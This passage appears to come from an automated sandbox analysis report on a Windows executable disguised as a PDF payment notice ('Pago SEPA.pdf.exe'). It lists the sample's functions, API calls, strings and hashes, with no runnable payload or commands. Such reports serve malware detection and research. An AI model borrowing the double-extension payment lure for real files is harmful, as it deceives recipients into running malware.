                                                                        • Part of subcall function 00405B59: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405E3A,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405B69
                                                                        • Part of subcall function 00405B59: lstrlenA.KERNEL32(00000000,?,00000000,00405E3A,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405B9B
                                                                      • GetShortPathNameW.KERNEL32(004265A8,004265A8,00000400), ref: 00405DA7
                                                                      • wsprintfA.USER32 ref: 00405DC5
                                                                      • GetFileSize.KERNEL32(00000000,00000000,004265A8,C0000000,00000004,004265A8,?,?,?,?,?), ref: 00405E00
                                                                      • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00405E0F
                                                                      • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E47
                                                                      • SetFilePointer.KERNEL32(00409578,00000000,00000000,00000000,00000000,004259A8,00000000,-0000000A,00409578,00000000,[Rename],00000000,00000000,00000000), ref: 00405E9D
                                                                      • GlobalFree.KERNEL32(00000000), ref: 00405EAE
                                                                      • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00405EB5
                                                                        • Part of subcall function 00405BF4: GetFileAttributesW.KERNELBASE(00000003,00402E2E,C:\Users\user\Desktop\Pago SEPA.pdf.exe,80000000,00000003,?,?,00000000,00403504,?), ref: 00405BF8
                                                                        • Part of subcall function 00405BF4: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,00000000,00403504,?), ref: 00405C1A
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2091062459.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2091042545.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091079709.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091341496.0000000000449000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_Pago SEPA.jbxd
                                                                      Similarity
                                                                      • API ID: File$CloseGlobalHandleNamePathShortlstrcpylstrlen$AllocAttributesCreateFreePointerSizewsprintf
                                                                      • String ID: %ls=%ls$NUL$[Rename]
                                                                      • API String ID: 222337774-899692902
                                                                      • Opcode ID: e80570f2f8cd2c9f135b21ee9e2312080ea8554e7c88b9adf45b38d7f754558e
                                                                      • Instruction ID: 907d7383bdf99192a2874dfd68d01e77647b980fe5b363d6f0c9d0989479472f
                                                                      • Opcode Fuzzy Hash: e80570f2f8cd2c9f135b21ee9e2312080ea8554e7c88b9adf45b38d7f754558e
                                                                      • Instruction Fuzzy Hash: 88311F71A05B14BBD6206B229C48F6B3A6CDF45755F14043ABE41F62D2DA3CEE018AFD
                                                                      Function 004062B3 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 69COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • CharNextW.USER32(00409300,*?|<>/":,00000000,"C:\Users\user\Desktop\Pago SEPA.pdf.exe",75923420,C:\Users\user\AppData\Local\Temp\,00000000,00403245,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403496), ref: 00406316
                                                                      • CharNextW.USER32(00409300,00409300,00409300,00000000), ref: 00406325
                                                                      • CharNextW.USER32(00409300,"C:\Users\user\Desktop\Pago SEPA.pdf.exe",75923420,C:\Users\user\AppData\Local\Temp\,00000000,00403245,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403496), ref: 0040632A
                                                                      • CharPrevW.USER32(00409300,00409300,75923420,C:\Users\user\AppData\Local\Temp\,00000000,00403245,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403496), ref: 0040633D
                                                                      Strings
                                                                      • *?|<>/":, xrefs: 00406305
                                                                      • C:\Users\user\AppData\Local\Temp\, xrefs: 004062B4
                                                                      • "C:\Users\user\Desktop\Pago SEPA.pdf.exe", xrefs: 004062F7
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2091062459.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2091042545.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091079709.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091341496.0000000000449000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_Pago SEPA.jbxd
                                                                      Similarity
                                                                      • API ID: Char$Next$Prev
                                                                      • String ID: "C:\Users\user\Desktop\Pago SEPA.pdf.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                                      • API String ID: 589700163-696370170
                                                                      • Opcode ID: 6a1238fba9ba947ddf3d1c913c8afd34c4b382e8901ee0696378a8a11e3e1ee4
                                                                      • Instruction ID: 54bf27a4ef4c29ba7f7e7f80dc621db20ebbd613429789f6f10e18307ece98db
                                                                      • Opcode Fuzzy Hash: 6a1238fba9ba947ddf3d1c913c8afd34c4b382e8901ee0696378a8a11e3e1ee4
                                                                      • Instruction Fuzzy Hash: B711946A80021295EB313B198C40AB7B6F8EF59750F56417FED86B32C0E77C5C9286ED
                                                                      Function 0040414A Relevance: 12.1, APIs: 8, Instructions: 61COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetWindowLongW.USER32(?,000000EB), ref: 00404167
                                                                      • GetSysColor.USER32(00000000), ref: 00404183
                                                                      • SetTextColor.GDI32(?,00000000), ref: 0040418F
                                                                      • SetBkMode.GDI32(?,?), ref: 0040419B
                                                                      • GetSysColor.USER32(?), ref: 004041AE
                                                                      • SetBkColor.GDI32(?,?), ref: 004041BE
                                                                      • DeleteObject.GDI32(?), ref: 004041D8
                                                                      • CreateBrushIndirect.GDI32(?), ref: 004041E2
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2091062459.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2091042545.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091079709.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091341496.0000000000449000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_Pago SEPA.jbxd
                                                                      Similarity
                                                                      • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                      • String ID:
                                                                      • API String ID: 2320649405-0
                                                                      • Opcode ID: bdecbf54746ac4e95bafbcd3f7306951f606de83f5b9b49a03f8dc0a3bab15ec
                                                                      • Instruction ID: 457b5273a6ad35ed29f896ddd043663fa6b3a1b95e22c78e57b6691615e2b460
                                                                      • Opcode Fuzzy Hash: bdecbf54746ac4e95bafbcd3f7306951f606de83f5b9b49a03f8dc0a3bab15ec
                                                                      • Instruction Fuzzy Hash: 1921A1B1804704ABCB219F68DD4CB4BBBF8AF40710F048A29ED92E62E0D734E944CB65
                                                                      Function 004025E5 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 151fileCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • ReadFile.KERNEL32(?,?,?,?), ref: 0040264D
                                                                      • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 00402688
                                                                      • SetFilePointer.KERNEL32(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 004026AB
                                                                      • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 004026C1
                                                                        • Part of subcall function 00405CD5: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 00405CEB
                                                                      • SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 0040276D
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2091062459.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2091042545.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091079709.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091341496.0000000000449000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_Pago SEPA.jbxd
                                                                      Similarity
                                                                      • API ID: File$Pointer$ByteCharMultiWide$Read
                                                                      • String ID: 9
                                                                      • API String ID: 163830602-2366072709
                                                                      • Opcode ID: 54de609a95a039770bb902f2e006f13192118be6fe7c7de42288ab6e45ce79fa
                                                                      • Instruction ID: 56da5788d6d90062f79809d4a3c22d6e203981add65e083e01e3e907f30c056e
                                                                      • Opcode Fuzzy Hash: 54de609a95a039770bb902f2e006f13192118be6fe7c7de42288ab6e45ce79fa
                                                                      • Instruction Fuzzy Hash: 3F512774D0021AAADF209F94CA88AAEB779FF04344F50447BE501F72E0D7B99D429B69
                                                                      Function 00404A48 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404A63
                                                                      • GetMessagePos.USER32 ref: 00404A6B
                                                                      • ScreenToClient.USER32(?,?), ref: 00404A85
                                                                      • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404A97
                                                                      • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404ABD
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2091062459.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2091042545.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091079709.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091341496.0000000000449000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_Pago SEPA.jbxd
                                                                      Similarity
                                                                      • API ID: Message$Send$ClientScreen
                                                                      • String ID: f
                                                                      • API String ID: 41195575-1993550816
                                                                      • Opcode ID: 8f99d7edcbb1b2af9b03d3486fc4037292eab20d77c75a8c6737f0729fb79e96
                                                                      • Instruction ID: 42cc3fd90da340ed33e1658783c39be2c5e0210da91f3d0a8fd677c6224e58ad
                                                                      • Opcode Fuzzy Hash: 8f99d7edcbb1b2af9b03d3486fc4037292eab20d77c75a8c6737f0729fb79e96
                                                                      • Instruction Fuzzy Hash: 19015E71E40218BADB00DB94DD85FFEBBBCAF54711F10016BBB11B61D0D7B8AA058BA5
                                                                      Function 00402D04 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40timeCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402D22
                                                                      • MulDiv.KERNEL32(0008B51A,00000064,0008B51E), ref: 00402D4D
                                                                      • wsprintfW.USER32 ref: 00402D5D
                                                                      • SetWindowTextW.USER32(?,?), ref: 00402D6D
                                                                      • SetDlgItemTextW.USER32(?,00000406,?), ref: 00402D7F
                                                                      Strings
                                                                      • verifying installer: %d%%, xrefs: 00402D57
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2091062459.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2091042545.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091079709.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091341496.0000000000449000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_Pago SEPA.jbxd
                                                                      Similarity
                                                                      • API ID: Text$ItemTimerWindowwsprintf
                                                                      • String ID: verifying installer: %d%%
                                                                      • API String ID: 1451636040-82062127
                                                                      • Opcode ID: a68141ec73b2a7b0005fea9bea2e0a343ee18c9164241d5958d7192c74469446
                                                                      • Instruction ID: 02b4a25e1ca2abb3aa07e0940f0a1006ed88c36cf357b8fab3844828eab6b7e4
                                                                      • Opcode Fuzzy Hash: a68141ec73b2a7b0005fea9bea2e0a343ee18c9164241d5958d7192c74469446
                                                                      • Instruction Fuzzy Hash: 3E01F471640209ABEF249F61DD49FEA3B69EB04305F008035FA05A92D1DBB999548F59
                                                                      Function 00402840 Relevance: 9.1, APIs: 6, Instructions: 86memoryfileCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000), ref: 00402894
                                                                      • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 004028B0
                                                                      • GlobalFree.KERNEL32(?), ref: 004028E9
                                                                      • GlobalFree.KERNEL32(00000000), ref: 004028FC
                                                                      • CloseHandle.KERNEL32(?), ref: 00402914
                                                                      • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000), ref: 00402928
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2091062459.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2091042545.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091079709.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091341496.0000000000449000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_Pago SEPA.jbxd
                                                                      Similarity
                                                                      • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                                      • String ID:
                                                                      • API String ID: 2667972263-0
                                                                      • Opcode ID: 87880a874489fc218ffeed1bb5b7a61d92979f204a9b9b6f840c636aa4f91737
                                                                      • Instruction ID: ec7c0e824f3835a9a78c8c015c1ffbc75d15747d838d6b82ce361eed526a9b83
                                                                      • Opcode Fuzzy Hash: 87880a874489fc218ffeed1bb5b7a61d92979f204a9b9b6f840c636aa4f91737
                                                                      • Instruction Fuzzy Hash: 1B219E72C00118BBCF216FA5CD49D9E7E79EF09324F24027AF520762E1C7796D419BA9
                                                                      Function 00402BFF Relevance: 7.6, APIs: 5, Instructions: 67registryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00402C20
                                                                      • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402C5C
                                                                      • RegCloseKey.ADVAPI32(?), ref: 00402C65
                                                                      • RegCloseKey.ADVAPI32(?), ref: 00402C8A
                                                                      • RegDeleteKeyW.ADVAPI32(?,?), ref: 00402CA8
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2091062459.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2091042545.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091079709.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091341496.0000000000449000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_Pago SEPA.jbxd
                                                                      Similarity
                                                                      • API ID: Close$DeleteEnumOpen
                                                                      • String ID:
                                                                      • API String ID: 1912718029-0
                                                                      • Opcode ID: 6121e8ff7f107a9e0c5c71db51fa80124b77cb8196dbe3be819c2b517f5432bf
                                                                      • Instruction ID: 783455ef39ba97bad4d92773a6bd33e03ba47aaf13af7a3f43d32fd345691cd1
                                                                      • Opcode Fuzzy Hash: 6121e8ff7f107a9e0c5c71db51fa80124b77cb8196dbe3be819c2b517f5432bf
                                                                      • Instruction Fuzzy Hash: 52115971908118FEEF119F90DE8CEAE3B79FB14384F100476FA05A10A0D3B49E52AA69
                                                                      Function 00401CFA Relevance: 7.5, APIs: 5, Instructions: 39windowCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetDlgItem.USER32(?,?), ref: 00401D00
                                                                      • GetClientRect.USER32(00000000,?), ref: 00401D0D
                                                                      • LoadImageW.USER32(?,00000000,?,?,?,?), ref: 00401D2E
                                                                      • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 00401D3C
                                                                      • DeleteObject.GDI32(00000000), ref: 00401D4B
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2091062459.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2091042545.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091079709.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091341496.0000000000449000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_Pago SEPA.jbxd
                                                                      Similarity
                                                                      • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                      • String ID:
                                                                      • API String ID: 1849352358-0
                                                                      • Opcode ID: 6f5942578b6a4d889e468e107b15febb45bc82c734be8bb27ce3994811ba1900
                                                                      • Instruction ID: fda10597d29eaa6b078217e10feb255e8dba845150ef54d65940bec6a2f4d034
                                                                      • Opcode Fuzzy Hash: 6f5942578b6a4d889e468e107b15febb45bc82c734be8bb27ce3994811ba1900
                                                                      • Instruction Fuzzy Hash: 3AF0C972A04104AFDB11DBA4EE88CEEBBBDEB48311B104566F602F61A1C675ED418B39
                                                                      Function 00401D56 Relevance: 7.5, APIs: 5, Instructions: 38COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetDC.USER32(?), ref: 00401D59
                                                                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401D66
                                                                      • MulDiv.KERNEL32(00000000,00000002,00000000), ref: 00401D75
                                                                      • ReleaseDC.USER32(?,00000000), ref: 00401D86
                                                                      • CreateFontIndirectW.GDI32(0040BDD0), ref: 00401DD1
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2091062459.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2091042545.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091079709.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091341496.0000000000449000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_Pago SEPA.jbxd
                                                                      Similarity
                                                                      • API ID: CapsCreateDeviceFontIndirectRelease
                                                                      • String ID:
                                                                      • API String ID: 3808545654-0
